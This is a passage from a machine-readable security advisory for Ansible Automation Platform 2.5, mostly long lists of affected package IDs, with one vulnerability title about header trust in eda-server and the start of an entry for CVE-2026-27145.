"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "eda-server: ExternalEventStreamViewSet trusts Subject header without validation and leaks expected DN"
},
{
"cve": "CVE-2026-27145",
"cwe": {
"id": "CWE-606",
"name": "Unchecked Input for Loop Condition"
},
"discovery_date": "2026-06-02T23:01:08.992540+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
